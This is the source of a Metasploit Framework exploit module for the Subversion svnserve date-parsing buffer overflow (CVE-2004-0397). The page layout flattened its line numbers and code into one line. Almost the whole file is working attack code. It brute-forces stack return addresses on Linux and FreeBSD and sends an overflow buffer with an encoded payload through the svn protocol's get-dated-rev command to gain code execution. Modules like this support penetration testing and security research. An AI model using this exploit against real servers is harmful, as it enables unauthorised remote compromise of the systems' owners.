|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135  |  ## # $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/exploit/http/client' class Metasploit3 < Msf::Exploit::Remote  Rank = AverageRanking  include Msf::Exploit::Brute  include Msf::Exploit::Remote::Tcp  def initialize(info = {})  super(update_info(info,  'Name' => 'Subversion Date Svnserve',  'Description'=> %q{  This is an exploit for the Subversion date parsing overflow.This  exploit is for the svnserve daemon (svn:// protocol) and will not work  for Subversion over webdav (http[s]://).This exploit should never  crash the daemon, and should be safe to do multi-hits.  **WARNING** This exploit seems to (not very often, I've only seen  it during testing) corrupt the subversion database, so be careful!  },  'Author' => 'spoonm',  'Version'=> '$Revision: 9971 $',  'References' =>  [  ['CVE', '2004-0397'],  ['OSVDB', '6301'],  ['BID', '10386'],  ['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],  ['MIL', '68'],  ],  'Payload'=>  {  'Space'=> 500,  'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",  'MinNops'=> 16,  },  'SaveRegisters'=> [ 'esp' ],  'Arch' => 'x86',  'Platform' => [ 'linux', 'bsd' ],  'Targets'=>  [  [  'Linux Bruteforce',  {  'Platform' => 'linux',  'Bruteforce' =>  {  'Start' => { 'Ret' => 0xbffffe13 },  'Stop'=> { 'Ret' => 0xbfff0000 },  'Step'=> 0  }  },  ],  [  'FreeBSD Bruteforce',  {  'Platform' => 'bsd',  'Bruteforce' =>  {  'Start' => { 'Ret' => 0xbfbffe13 },  'Stop'=> { 'Ret' => 0xbfbf0000 },  'Step'=> 0  }  },  ],  ],  'DisclosureDate' => 'May 19 2004'))  register_options(  [  Opt::RPORT(3690),  OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])  ], self.class)  register_advanced_options(  [  # 62 on spoonm's, 88 on HD's  OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),  OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])  ], self.class)  end  def check  end  def brute_exploit(addresses)  connect  print_status("Trying #{"%.8x" % addresses['Ret']}...")  buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded  [  "( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",  "( ANONYMOUS ( 0; ) )",  "( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "  ].each_with_index { |buf, index|  trash = sock.get_once  print_line("Received: #{trash}") if debugging?  if (sock.put(buf) || 0) == 0 and index < 3  print_error("Error transmitting buffer.")  raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']  end  if index == 3 and trash.length > 0  print_error("Received data when we shouldn't have")  raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']  end  }  handler  disconnect  end  def lengther(buf)  "#{buf.length}:" + buf  end end  |